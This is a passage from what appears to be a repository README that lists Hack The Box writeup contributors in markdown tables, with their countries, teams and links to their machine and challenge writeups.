src="./images/countries/switzerland.png" height="24" width="24"> | frosters | [<img src="./images/frosters.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/32730) | solitaire wolf | [Aragog,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Aragog/frosters-aragog.pdf) [Silo,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Silo/frosters-silo.pdf) [Bounty,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bounty/frosters-bounty.pdf) [Rabbit,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Rabbit/frosters-rabbit.pdf) [Dev0ps,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/frosters-dev0ops.pdf) [Valentine, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Valentine/frosters-valentine.pdf) [Secnotes, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Secnotes/frosters-secnotes.pdf) [Oz](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Oz/frosters-oz.pdf) | | 8 | 21 | <img src="./images/countries/spain.png" height="24" width="24"> | mgp25 | [<img src="./images/MemoryLeaks.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/55321) | [MemoryLeaks](https://www.hackthebox.eu/home/teams/profile/1680) || [Blue Shadow](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-BlueShadow.pdf), [Deadly Arthropod](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-DeadlyArthropod.pdf), [MarketDump](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-MarketDump.pdf), [Marshall In The Middle](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-MarshallInTheMiddle.pdf), [Obscure](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-Obscure.pdf), [Reminiscent](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-Reminiscent.pdf), [Took The Byte](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-TooktheByte.pdf), [USB Ripper](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MemoryLeaks-USBRipper.pdf)| 8 | 22 | <img src="./images/countries/spain.png" height="24" width="24"> | 7Rocky | [<img src="./images/7Rocky.jpg" height="42" width="42">](https://www.hackthebox.eu/profile/532274) | [CocoTeam](https://www.hackthebox.eu/home/teams/profile/4061) | | [Lost Modulus](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Lost%20Modulus/Lost%20Modulus-7Rocky.zip), [Lost Modulus Again](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Lost%20Modulus%20Again/Lost%20Modulus%20Again-7Rocky.pdf), [LunaCrypt](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/LunaCrypt/LunaCrypt-7Rocky.zip), [mysterybox](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/mysterybox/mysterybox-7Rocky.pdf), [RLotto](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/RLotto/RLotto-7Rocky.zip), [racecar](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/racecar/racecar-7Rocky.zip), [Restaurant](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/Restaurant/Restaurant-7Rocky.zip), [baby CachedView](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/baby%20CachedView/baby%20CachedView-7Rocky.zip) | 8 | 23 | <img src="./images/countries/kosovo.png" height="24" width="24"> | artikrh | [<img src="./images/artikrh.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/41600) | [Sushi](https://www.hackthebox.eu/home/teams/profile/780) | [Hawk,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Hawk/artikrh-hawk.pdf) [Stratosphere, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Stratosphere/artikrh-stratosphere.pdf) [Reddish, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Reddish/artikrh-reddish.pdf) [Waldo, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Waldo/artikrh-waldo.pdf) [Dab, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Dab/artikrh-dab.pdf) [Secnotes, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Secnotes/artikrh-secnotes.pdf) [Access](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Access/artikrh-access.pdf) | | 7 | 24 | <img src="./images/countries/germany.png" height="24" width="24"> | Sekisback | [<img src="./images/Sekisback.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/73424) | solitaire wolf | [Carrier, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Carrier/sekisback-Carrier.pdf) [Teacher, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Teacher/sekisback-Teacher.pdf) [Ypuffy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ypuffy/sekisback-Ypuffy.pdf)[Redcross, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Redcross/sekisback-redcross.pdf) [Lightweight, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Lightweight/sekisback_lightweight.pdf) [Conceal, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Conceal/sekisback-conceal.pdf) [Fortune](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Fortune/sekisback-fortune.pdf)| | 7 | 25 | <img src="./images/countries/spain.png" height="24" width="24"> | un1k0n | [<img src="./images/MemoryLeaks.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/57600) | [MemoryLeaks](https://www.hackthebox.eu/home/teams/profile/1680) || [Keys](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Keys/MemoryLeaks-Keys.pdf), [Decode me](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Decode%20me/MemoryLeaks-Decode_Me.pdf), [lernaean](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/lernaean/MemoryLeaks-Lernaean.pdf), [cartographer](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/cartographer/MemoryLeaks-cartographer.pdf), [grammar](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/grammar/MemoryLeaks-grammar.pdf), [Emdee five for life](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/MemoryLeaks-Emdee_five_for_life.pdf), [ezpz](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/ezpz/MemoryLeaks-ezpz.pdf)| 7 | 26 | <img src="./images/countries/Albania.png" height="24" width="24"> | amber | [<img src="./images/amber.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/16631) | solitaire wolf | [Vault, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Vault/amber-vault.pdf) [Giddy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Giddy/amber-giddy.pdf) [Frolic, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Frolic/amber-frolic.pdf) [Chaos](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Chaos/amber-chaos.pdf) | [Infinite Descent, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Infinite_Descent/amber-infinite_descent.pdf) [Call, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Call/amber-call.pdf) [blacksquare](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/blackSquare/amber-blacksquare.pdf) | 7 | 27 | <img src="./images/countries/canada.png" height="24" width="24"> | Hilbert | [<img src="./images/Hilbert.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/182543) | Solitaire wolf | [Mango, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mango/Hilbert-Mango.pdf) [Blocky, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blocky/Hilbert-Blocky.pdf) [Postman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Postman/wezzlaren-Postman-writeup.pdf) [Networked, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Networked/Hilbert-Networked.pdf) [Traverxec, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/Hilbert-Traverxec.pdf) [Obscurity](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/Hilbert-Obscurity.pdf)| [BabyEncryption](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/BabyEncyption/Hilbert-BabyEncryption.pdf)| 7 | 28 | <img src="./images/countries/uk.png" height="24" width="24"> | VbScrub | [<img src="./images/vbscrub.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/158833) | Solitaire wolf | [Bastion](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bastion/VbScrub-Bastion.pdf), [Resolute](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Resolute/VbScrub-Resolute.pdf), [Monteverde](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Monteverde/VbScrub-Monteverde.pdf), [Forest](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Forest/VbScrub-Forest.pdf), [JSON](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Json/vbscrub-json.pdf), [Sniper](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sniper/VbScrub-Sniper.pdf)| | 6 | 29 | <img src="./images/countries/mexico.png" height="24" width="24"> | Str0ng3erG3ek | [<img src="./images/stronger2.png" height="42" width="42">](https://www.hackthebox.eu/users/home/profile/178277) | [Vyt3k1ng5](https://www.hackthebox.eu/home/teams/profile/2390) | [Control](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Control/CONTROL-Str0ng3erG3ek-ES-V1.pdf), [Monteverde](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Monteverde/MONTEVERDE-Str0ng3erG3ek-ES-V1.pdf), [Registry](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Registry/REGISTRY-Str0ng3erG3ek-ES-V2.pdf), [Sniper](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sniper/SNIPER-Str0ng3erG3ek-ES-V2.pdf), [Traverxec](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/TRAVERXEC-Str0ng3erG3ek-ES-V2.pdf), [Sauna](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sauna/SAUNA-Str0ng3erG3ek-ES-V1.pdf)| | 6 | 30 | <img src="./images/countries/spain.png" height="24" width="24"> | OscarAkaElvis | [<img src="./images/oscarakaelvis.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/32334) | [CommandlineKings](https://www.hackthebox.com/home/teams/profile/2102) | [Olympus](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/oscarakaelvis-olympus.pdf) | [The Art of Reversing,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/theartofreversing/oscarakaelvis-the_art_of_reversing.pdf) [I know Mag1k,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/iknowmag1k/oscarakaelvis-i_know_mag1k.pdf) [Retro,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Retro/oscarakaelvis-retro.pdf) [Nostalgia](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Nostalgia/OscarAkaElvis-nostalgia.pdf) | 6 | # Occasional contributors (2-5 writeups) Ctry | nick | avatar | team | machines | challenges --- | --- | --- | --- | --- | --- <img src="./images/countries/spain.png" height="24" width="24"> | manulqwerty | [<img src="./images/manulqwerty.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/25205) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Stratosphere,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Stratosphere/Stratosphere-manulqwerty.pdf) [Canape,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Canape/manulqwerty-canape.pdf) [Nibbles,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nibbles/manulqwerty-nibbles.pdf) [Bounty, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bounty/manulqwerty-bounty.pdf) [Jarvis, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jarvis/manulqwerty-jarvis.pdf) | <img src="./images/countries/india.png" height="24" width="24"> | humurabbi | [<img src="./images/humurabbi.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/47509) | Solitaire wolf | [Safe,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Safe/humurabbi-Safe.pdf)[Heist, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Heist/humurabbi-Heist.pdf)[Unattended, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Unattended/humurabbi-Unattended.pdf)[Networked, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Networked/humurabbi-Networked.pdf)[Craft](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/humurabbi-Craft.pdf) | | <img src="./images/countries/india.png" height="24" width="24"> | mansoor | [<img src="./images/mansoor.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/52134) | Solitaire wolf | [Ellingson,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ellingson/Mansoor-ellingson.pdf) [Safe,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Safe/Mansoor-Safe.pdf) [Frolic,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Frolic/Mansoor-Frolic.pdf) [OneTwoSeven,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OneTwoSeven/Mansoor-OneTwoSeven.pdf) [Ghoul](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ghoul/Mansoor-Ghoul.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | Leonishan | [<img src="./images/leonishan.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/3182) | solitaire wolf | [Helpline, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Helpline/leonishan-helpline.pdf) [Unattended](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Unattended/Leonishan-Unattended.pdf) | [Blue Shadow, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/leonishan-blue_shadow.pdf) [Reminiscent, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/leonishan-reminiscent.pdf) [Took the byte](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Leonishan-Took_the_byte.pdf) | <img src="./images/countries/holland.png" height="24" width="24"> | wilde | [<img src="./images/wilde.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/73116) | Solitaire wolf | [Active, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/wilde-active.zip) [Waldo, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Waldo/wilde-waldo.pdf) [Hawk, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Hawk/wilde-hawk.pdf) [Zipper](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/zipper/wilde-zipper.pdf) | | <img src="./images/countries/usa.png" height="24" width="24"> | fibbot | [<img src="./images/fibbot.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/56623) | solitaire wolf | [Celestial, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Celestial/fibbot-celestial.pdf) [Poison, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Poison/fibbot-poison.pdf) [Canape, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Canape/fibbot-canape.pdf) [Sunday](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sunday/fibbot-sunday.pdf) | | <img src="./images/countries/kosovo.png" height="24" width="24"> | spenkk | [<img src="./images/spenkk.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/19869) | [Sentry](https://www.hackthebox.eu/home/teams/profile/637) | [Bart,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bart/spenkk-bart.pdf) [Dev0ops,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/spenkk-dev0ops.pdf) [Dropzone](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Dropzone/spenkk-dropzone.pdf) | [snake](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/snake/spenkk-snake.pdf) | <img src="./images/countries/uk.png" height="24" width="24"> | ozunu | [<img src="./images/ozunu.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/53012) | [OzunuClan](https://www.hackthebox.eu/home/teams/profile/919) | [Giddy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Giddy/ozunu-giddy.pdf) [Irked, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Irked/ozunu-irked.pdf) [Teacher, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Teacher/ozunu-teacher.pdf) [Access](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Access/ozunu-access.pdf)| | <img src="./images/countries/spain.png" height="24" width="24"> | n4xh4ck5 | [<img src="./images/n4xh4ck5.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/5785) | solitaire wolf | [Jerry, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/n4xh4ck5-jerry.pdf) [PopCorn, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Popcorn/Popcorn-n4xh4ck5.pdf) [Haircut, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Haircut/n4xh4ck5_haircut_write_up.pdf) [Curling](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Curling/n4ch4ck5-curling.pdf)| | <img src="./images/countries/spain.png" height="24" width="24"> | 3v4Si0N | [<img src="./images/3v4Si0n.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/1979) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Canape,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Canape/3v4si0n-canape.pdf) [TartarSauce,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/TartarSauce/3v4Si0N-tartarsauce.pdf) [Bounty](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bounty/Bounty-3v4Si0N.pdf) | <img src="./images/countries/world.png" height="24" width="24"> | Pitenager | [<img src="./images/pitenager.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/16595) | solitaire wolf | [Blue,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blue/pitenager-blue.pdf) [Mirai,](https://githu89b.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mirai/pitenager-mirai.pdf) [Nibbles](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nibbles/pitenager-nibbles.pdf) | [Cartographer,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/cartographer/pitenager-cartographer.pdf) [Lernaean](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/lernaean/pitenager-lernaean.pdf) <img src="./images/countries/poland.png" height="24" width="24"> | x4nt0n | [<img src="./images/x4nt0n.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/37317) | [AlphaPwner](https://www.hackthebox.eu/home/teams/profile/673) | [Sunday, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sunday/x4nt0n-Sunday.pdf) [Olympus, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/x4nt0n-Olympus.pdf) [Access](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Access/x4nt0n-aAccess.pdf) | [Marshal In The Middle](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/x4nt0n-Marshal_In_The_Middle.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | FrankyTech | [<img src="./images/frankytech.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/7081) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Active, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/frankytech-active.pdf) [Dev0ops, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/frankytech-dev0ops.pdf) [Olympus](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/frankytech-olympus.pdf) | | <img src="./images/countries/india.png" height="24" width="24"> | TheLegend | [<img src="./images/TheLegend.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/3105) | solitaire wolf | [Active, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/TheLegend-Active.pdf) [Dev0ops](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/TheLegend-DevOops.pdf)| [I know Mag1k, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/iknowmag1k/TheLegend-IknowMag1k.pdf) [Snake](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/snake/TheLegend-Snake.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | kabutor | [<img src="./images/kabutor.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/30810) | solitaire wolf | [Aragog, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Aragog/kabutor-aragog.pdf) [Access, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Access/kabutor-access.pdf) [LaCasaDePapel_alt](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/LaCasaDePapel/kabutor-LaCasaDePapel_alt.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | Vis0r | [<img src="./images/vis0r.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/1811) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Blocky,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blocky/vis0r_blocky.pdf) [Chatterbox](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Chatterbox/vis0r-chatterbox.pdf) | [Matrioshka](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Matrioshka/vis0r-matrioshka.pdf) | <img src="./images/countries/india.png" height="24" width="24"> | 31337 | [<img src="./images/31377.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/191179) | | [Writeup, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/31377-writeup.pdf) [Haystack, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Haystack/31773-haystack.pdf) [Ellingson](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ellingson/31337-ellingson.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | giru | [<img src="./images/giru.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/41999) | solitaire wolf | [Irked, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Irked/giru-irked.pdf) [Bounty](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bounty/giru-bounty.pdf) | | <img src="./images/countries/turkey.png" height="24" width="24"> | morph3 | [<img src="./images/morph3.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/51398) | solitaire wolf | [Help, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Help/morph3-help.pdf) [Friendzone](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Friendzone/morph3-friendzone.pdf)| | <img src="./images/countries/usa.png" height="24" width="24"> | Paint | [<img src="./images/paint.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/48707) | solitaire wolf | [Carrier, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Carrier/paint-carrier.pdf) [Ethereal](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ethereal/paint-ethereal.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | Ghostpp7 | [<img src="./images/Ghostpp7.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/24844) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Valentine,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Valentine/Ghostpp7-Valentine.pdf) [TartarSauce](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/TartarSauce/ghostpp7-tartarsauce.pdf) | <img src="./images/countries/italy.png" height="24" width="24"> | o00o | [<img src="./images/o00o.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/47231) | solitarire wolf | [Reel,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Reel/o00o-reel.pdf) [Nightmare](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nightmare/o00o_nightmare.pdf) | | <img src="./images/countries/india.png" height="24" width="24"> | felli0t | [<img src="./images/felli0t.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/11516) | solitaire wolf | [DevOops,](https://github.com/its-arun/hackthebox-writeups/blob/master/machines/DevOops/felli0t-DevOops.pdf) [Chatterbox](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Chatterbox/felli0t-Chatterbox.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | CyberVaca | [<img src="./images/cybervaca.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/6956) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Chatterbox,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Chatterbox/cybervaca-chatterbox.pdf) [Reddish](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Reddish/reddish-cybervaca.pdf)| <img src="./images/countries/spain.png" height="24" width="24"> | b1gb1t | [<img src="./images/b1gb1t.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/13885) | [r00th4ck](https://www.hackthebox.eu/home/teams/profile/450) | [Sunday, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sunday/b1gb1t-Sunday.pdf) [Active](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/b1gb1t-Active.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | roskyfrosky | [<img src="./images/roskyfrosky.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/1746) | solitaire wolf | [Jerry, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/roskyfrosky-jerry.pdf) [Celestial](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Celestial/Roskyfrosky-Celestial.pdf)| | <img src="./images/countries/colombia.png" height="24" width="24"> | Sephiroth | [<img src="./images/sephiroth.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/67969) | [Bin4ryCh4os](https://www.hackthebox.eu/home/teams/profile/1403) | [Fortune, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Fortune/Sephiroth-Fortune.zip) [Vault](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Vault/Sephiroth-Vault.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | BinaryShadow | [<img src="./images/BinaryShadow.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/14785) | [Watch4Hack](https://www.hackthebox.eu/home/teams/profile/401) | [Safe](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Safe/BinaryShadow-Safe.pdf) | [Call, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Call/BinaryShadow-Call.pdf) [Crack this!, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Crack_This/BinaryShadow-Crack_This!.pdf) [Decode me](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Decode%20me/BinaryShadow-Decode_Me.pdf) |) <img src="./images/countries/russia.png" height="24" width="24"> | tabacci | [<img src="./images/tabacci.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/69650) | Solitaire wolf | [HackBack, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Hackback/tabacci-HackBack.pdf) [RE](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/RE/tabacci-RE.pdf) | [Obscure,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/tabacci-obscure.pdf) [Nostalgia,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Nostalgia/tabacci-nostalgia.pdf) [LostKey,](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/crypto/LostKey/tabacci-lostkey.pdf) [Masks Off,](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/forensics/tabacci-MasksOff.pdf) [Partial Encryption](https://github.com/Hackplayers/hackthebox-writeups/tree/master/challenges/reversing/Partial%20Encryption/tabacci-PartialEncryption.pdf) | <img src="./images/countries/japan.png" height="24" width="24"> | thereallulz | [<img src="./images/thereallulz.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/18659) | solitaire wolf | | [Retro,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Retro/thereallulz-retro.pdf) [Monstrosity,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Monstrosity/thereallulz-monstrosity.pdf) [Senseless Behaviour](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Senseless_Behaviour/thereallulz-senseless-behaviour.pdf) 